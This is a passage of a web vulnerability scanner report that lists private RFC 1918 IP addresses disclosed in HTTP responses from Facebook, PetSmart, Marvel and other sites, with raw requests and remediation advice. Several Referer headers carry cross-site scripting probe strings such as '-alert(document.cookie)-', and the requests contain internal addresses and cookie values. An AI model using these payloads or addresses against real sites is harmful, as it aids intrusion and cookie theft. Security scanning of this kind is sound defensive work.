globalConfiguration.GLOBAL_webEnvironment = "Live";
globalConfiguration.TGUS_McAfeeSECURE_Enabled = "1";
globalConfiguration.TGUS_VeriSign_Enabled = "1";
globalConfiguration.TGUS_SiteCatalyst_En
...[SNIP]...
edUrl = "/";
brandConfiguration.Arc = "000329";
brandConfiguration.BuyPhoneNumber = "1.800.826.4919";
brandConfiguration.SupportPhoneNumber = "1.715.345.0505";
brandConfiguration.ContactUsEmail = "webmaster@travelguard.com";
brandConfiguration.Field1 = ["Question 1", "Question 2"];
//]]>
...[SNIP]...

21. Private IP addresses disclosed previous next
There are 89 instances of this issue:

http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif
http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif
http://rya.rockyou.com/ams/ptrck.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/vnjkQm4QANt.js
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JS3nOGeZ6_r.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/fyAhkjMytaS.css
http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png
http://subscriptions.marvel.com/
http://subscriptions.marvel.com/checkout/
https://subscriptions.marvel.com/checkout/
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

21.1. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://includes.petsmart.com
Path:	/homepage/redesigned/images/logo-facebook.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.96.228

Request

Response

21.2. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://includes.petsmart.com
Path:	/homepage/redesigned/images/logo-twitter.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.96.228

Request

Response

21.3. http://rya.rockyou.com/ams/ptrck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rya.rockyou.com
Path:	/ams/ptrck.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.130.8.33

Request

Response

21.4. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1baeb5cbc%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff38148ebcc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.194
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1409
Expires: Mon, 16 May 2011 10:57:37 GMT
Date: Mon, 16 May 2011 10:34:08 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

21.5. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.185

Request

GET /rsrc.php/v1/y2/r/Bj5jbUlrgiA.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 10 May 2011 17:15:32 GMT
X-FB-Server: 10.138.16.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31041985
Expires: Wed, 09 May 2012 17:28:01 GMT
Date: Mon, 16 May 2011 10:41:36 GMT
Connection: close
Content-Length: 37236

/*1305048537,176820409*/

if (window.CavalryLogger) { CavalryLogger.start_js(["lIKWr"]); }

if(!window.skipDomainLower&&navigator&&navigator.userAgent&&document.domain.toLowerCase().match(/(^|\.)faceb
...[SNIP]...

21.6. http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/vnjkQm4QANt.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yS/r/vnjkQm4QANt.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /rsrc.php/v1/yS/r/vnjkQm4QANt.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 10 May 2011 05:43:32 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31141619
Expires: Thu, 10 May 2012 21:08:38 GMT
Date: Mon, 16 May 2011 10:41:39 GMT
Connection: close
Content-Length: 68202

/*1305148153,169775559*/

if (window.CavalryLogger) { CavalryLogger.start_js(["JYXUq"]); }

!function(){function a(b){return function(){if(this===window)throw new TypeError();return b.apply(this,argum
...[SNIP]...

21.7. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JS3nOGeZ6_r.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yW/r/JS3nOGeZ6_r.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /rsrc.php/v1/yW/r/JS3nOGeZ6_r.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 05 May 2011 04:10:28 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30909670
Expires: Tue, 08 May 2012 04:42:48 GMT
Date: Mon, 16 May 2011 10:41:38 GMT
Connection: close
Content-Length: 25640

/*1304916151,169775815*/

if (window.CavalryLogger) { CavalryLogger.start_js(["evTQd"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

21.8. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/fyAhkjMytaS.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yX/r/fyAhkjMytaS.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /rsrc.php/v1/yX/r/fyAhkjMytaS.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 11 May 2011 05:30:26 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31141665
Expires: Thu, 10 May 2012 21:09:21 GMT
Date: Mon, 16 May 2011 10:41:36 GMT
Connection: close
Content-Length: 32644

/*1305148157,169775559*/

.DOMControl_placeholder{color:#777}
.no_js .DOMControl_placeholder{color:#000}
.DOMControl_shadow{left:-10000px;position:absolute;top:-10000px;white-space:pre-wrap}
body{back
...[SNIP]...

21.9. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z7/r/ql9vukDCc4R.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.184

Request

GET /rsrc.php/v1/z7/r/ql9vukDCc4R.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/fyAhkjMytaS.css

Response

HTTP/1.1 200 OK
Content-Length: 1177
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 06:11:23 GMT
X-FB-Server: 10.138.17.184
Cache-Control: public, max-age=30903461
Expires: Tue, 08 May 2012 02:59:21 GMT
Date: Mon, 16 May 2011 10:41:40 GMT
Connection: close

.PNG
.
...IHDR...............2...#PLTE.........444...l........6X.......fff...s.....ddd...DDDUUUQl..E.......`x.......;Y..........MMMcx.u.................bw.............uuu...............h.......Xj.
...[SNIP]...

21.10. http://subscriptions.marvel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://subscriptions.marvel.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.100.202
192.168.100.57

Request

Response

21.11. http://subscriptions.marvel.com/checkout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://subscriptions.marvel.com
Path:	/checkout/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.100.2
192.168.100.222

Request

Response

21.12. https://subscriptions.marvel.com/checkout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://subscriptions.marvel.com
Path:	/checkout/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.100.114
192.168.100.7

Request

Response

21.13. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.213.67

Request

Response

21.14. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.122.113

Request

GET /extern/login_status.php?api_key=4d15f6008d23faa991f6df49d07988c6&extern=0&channel=http%3A%2F%2Fwww.siteadvisor.com%2Fdownload%2Fwindows.html%3Fcid%3D64895%26fbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.siteadvisor.com/download/windows.html?cid=64895
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.122.113
X-Cnection: close
Date: Mon, 16 May 2011 02:06:38 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

21.15. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.126.55

Request

GET /extern/login_status.php?api_key=LikeDetail&app_id=LikeDetail&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df167f3fa48%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff3f98fefa8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df250fc0ac%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff3f98fefa8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1055a2cec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2ef19926%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff3f98fefa8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1055a2cec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df22445b1a8%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff3f98fefa8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1055a2cec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc79658d8%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff3f98fefa8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1055a2cec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.126.55
X-Cnection: close
Date: Mon, 16 May 2011 02:03:31 GMT
Content-Length: 22

Invalid Application ID

21.16. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.29.25

Request

GET /extern/login_status.php?api_key=LikeDetail&app_id=LikeDetail&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c2f0030%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df164f97d0%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3e52e016%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1e4c4f9bc%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df346e6536%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.25
X-Cnection: close
Date: Mon, 16 May 2011 01:58:45 GMT
Content-Length: 22

Invalid Application ID

21.17. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.194.110

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

21.18. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.23.105

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.19. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.234.39

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.20. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.154.119

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.21. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.108.61

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.22. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.171.120

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

21.23. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.189.114

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
